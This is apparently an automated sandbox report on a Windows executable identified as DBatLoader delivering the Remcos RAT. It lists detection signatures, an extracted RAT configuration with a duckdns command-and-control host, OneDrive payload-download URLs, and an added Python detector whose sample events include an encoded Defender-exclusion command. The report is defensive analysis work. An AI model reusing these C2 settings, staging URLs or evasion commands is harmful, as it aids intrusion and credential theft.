Windows Analysis Report
midyear_statement.exe

Overview

General Information

Sample name: midyear_statement.exe
Analysis ID: 1417015
MD5: dd8e3f6ac5c24960b3a69490082c60e1
SHA1: c5f8aaec5baa571791789dd5fac53e27938dbc29
SHA256: 15db18392d7bbf15b30e528db05ec306e00ac3227277d0639064ec3e2bc98c73
Tags: exe

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: TrustedPath UAC Bypass Pattern
Snort IDS alert for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
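Several of the behaviours in the list above, and in the Networking evidence later in this report, reduce to a handful of checks a detection engineer can run over endpoint and network telemetry: a directory component with a trailing space (the "C:\Windows \System32" mock trusted path behind the TrustedPath UAC bypass and DLL search-order hijack signatures), a Defender exclusion added through a base64-encoded MpPreference cmdlet, a Run key pointing into a user-writable folder, a dynamic DNS lookup, and an HTTP request with no User-Agent. The following is an added example written for this page; it is not Joe Sandbox code or any of its signatures. The simplified event shape and every entry in SAMPLE_EVENTS are constructed for illustration: the mock-directory paths are modelled on the netutils.dll path recorded in this report, while the easinvoker.exe location and the Run value name are assumptions.

```python
"""Checks for the behaviours this report flags, run over constructed sample
telemetry. Added example, not Joe Sandbox code: the simplified event shape
and every event in SAMPLE_EVENTS are constructed for illustration."""
import base64
import binascii
import re

SUSPICIOUS_DIRS = ("c:\\users\\public\\", "c:\\programdata\\",
                   "\\appdata\\local\\temp\\", "c:\\windows\\temp\\")
DYNDNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".no-ip.com",
                   ".ddns.net", ".hopto.org")
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def has_mock_trusted_dir(path: str) -> bool:
    """True when a directory component carries trailing whitespace, which is
    how 'C:\\Windows \\System32' impersonates the real trusted path."""
    return any(p != p.rstrip() for p in path.split("\\")[:-1])


def decode_powershell(cmdline: str) -> str:
    """Inline an -EncodedCommand payload (UTF-16LE, base64) so keyword
    matching sees the real cmdlet; undecodable payloads are left alone."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        plain = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return cmdline
    return cmdline[:m.start()] + plain


def is_defender_exclusion(cmdline: str) -> bool:
    plain = decode_powershell(cmdline).lower()
    return "add-mppreference" in plain and "-exclusion" in plain


def in_suspicious_dir(path: str) -> bool:
    return any(d in path.lower().strip('"') for d in SUSPICIOUS_DIRS)


def is_dyndns(name: str) -> bool:
    return name.lower().rstrip(".").endswith(DYNDNS_SUFFIXES)


def scan(events):
    """Return (rule, evidence) pairs for every event that trips a check."""
    hits = []
    for ev in events:
        kind = ev.get("type")
        if kind == "process":
            if has_mock_trusted_dir(ev["image"]):
                hits.append(("trustedpath_mock_directory", ev["image"]))
            if in_suspicious_dir(ev["image"]):
                hits.append(("execution_from_suspicious_folder", ev["image"]))
            if is_defender_exclusion(ev.get("cmdline", "")):
                hits.append(("defender_exclusion_added",
                             decode_powershell(ev["cmdline"])))
        elif kind == "image_load" and has_mock_trusted_dir(ev["loaded"]):
            hits.append(("dll_loaded_from_mock_directory", ev["loaded"]))
        elif kind == "registry":
            if ("\\currentversion\\run\\" in ev["key"].lower()
                    and in_suspicious_dir(ev["value"])):
                hits.append(("run_key_to_suspicious_folder", ev["value"]))
        elif kind == "dns" and is_dyndns(ev["query"]):
            hits.append(("dynamic_dns_query", ev["query"]))
        elif kind == "http":
            if not any(h.lower() == "user-agent" for h in ev.get("headers", {})):
                hits.append(("http_without_user_agent", ev["host"] + ev["path"]))
    return hits


def _enc(ps: str) -> str:
    """Package a script the way -EncodedCommand expects (constructed input)."""
    return base64.b64encode(ps.encode("utf-16le")).decode()


# Constructed sample events modelled on this report's findings; the
# easinvoker.exe location and the Run value name are assumptions.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Users\Public\Libraries\wkrriuhD.pif",
     "cmdline": r"C:\Users\Public\Libraries\wkrriuhD.pif"},
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc "
                + _enc(r"Add-MpPreference -ExclusionPath C:\Users\Public\Libraries")},
    {"type": "image_load", "image": r"C:\Windows \System32\easinvoker.exe",
     "loaded": r"C:\Windows \System32\netutils.dll"},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\remcos",
     "value": r"C:\Users\Public\Libraries\wkrriuhD.pif"},
    {"type": "dns", "query": "www.zuckdgreb.duckdns.org"},
    {"type": "http", "host": "geoplugin.net", "path": "/json.gp",
     "headers": {"Cache-Control": "no-cache"}},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},  # benign control: trips nothing
]

if __name__ == "__main__":
    for rule, evidence in scan(SAMPLE_EVENTS):
        print(f"{rule:34} {evidence}")
```

The mock-directory check deliberately looks at every component rather than only "Windows " so it also catches the same trick under other trusted roots; the PowerShell decoder is what keeps a plain "Add-MpPreference" string match from being bypassed by -EncodedCommand, which is exactly the variant the "Powershell Base64 Encoded MpPreference Cmdlet" signature above exists for.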

Classification

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection

Source: http://geoplugin.net/json.gp/C URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp URL Reputation: Label: phishing
Source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos
{
  "Host:Port:Password": "xwww.zuckdgreb.duckdns.org:4445:0",
  "Assigned name": "vista",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-W5UGP5",
  "Keylog flag": "1",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF ReversingLabs: Detection: 26%
Source: C:\Windows \System32\netutils.dll ReversingLabs: Detection: 75%
Source: midyear_statement.exe ReversingLabs: Detection: 26%
Source: midyear_statement.exe Virustotal: Detection: 31% Perma Link
Source: Yara match File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12363837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 24_2_12363837
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData, 27_2_00404423
Source: wkrriuhD.pif Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123374FD _wcslen,CoGetObject, 24_2_123374FD

Compliance

Source: C:\Users\Public\Libraries\wkrriuhD.pif Unpacked PE file: 24.2.wkrriuhD.pif.12330000.2.unpack
Source: C:\Users\Public\Libraries\wkrriuhD.pif Unpacked PE file: 31.2.wkrriuhD.pif.24140000.2.unpack
Source: midyear_statement.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49734 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
Source: Binary string: easinvoker.pdbH source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_040A5878
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose, 24_2_00401612
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime, 24_2_0040128D
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12339253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 24_2_12339253
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 24_2_1234C291
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 24_2_1233C34D
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12339665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 24_2_12339665
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12349AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 24_2_12349AF5
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 24_2_1233BB30
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233783C FindFirstFileW,FindNextFileW, 24_2_1233783C
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 24_2_1233880C
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1237E879 FindFirstFileExA, 24_2_1237E879
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 24_2_1233BD37
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_146410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 24_2_146410F1
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_14646580 FindFirstFileExA, 24_2_14646580
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0040AE51 FindFirstFileW,FindNextFileW, 27_2_0040AE51
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 28_2_00407EF8
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12337C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 24_2_12337C97

Networking

Source: Traffic Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.7:49708 -> 192.3.109.132:4445
Source: Traffic Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 192.3.109.132:4445 -> 192.168.2.7:49708
Source: Malware configuration extractor URLs: xwww.zuckdgreb.duckdns.org
Source: unknown DNS query: name: www.zuckdgreb.duckdns.org
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040BD1D0 InternetCheckConnectionA, 0_2_040BD1D0
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 13.107.139.11
Source: Joe Sandbox View IP Address: 178.237.33.50
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 24_2_1234B380
Source: wkrriuhD.pif, 0000001B.00000003.1405784796.0000000000AA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wkrriuhD.pif, 0000001B.00000003.1405784796.0000000000AA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: wkrriuhD.pif, 0000001B.00000002.1406582942.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wkrriuhD.pif, 0000001B.00000002.1406582942.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
Source: wkrriuhD.pif String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
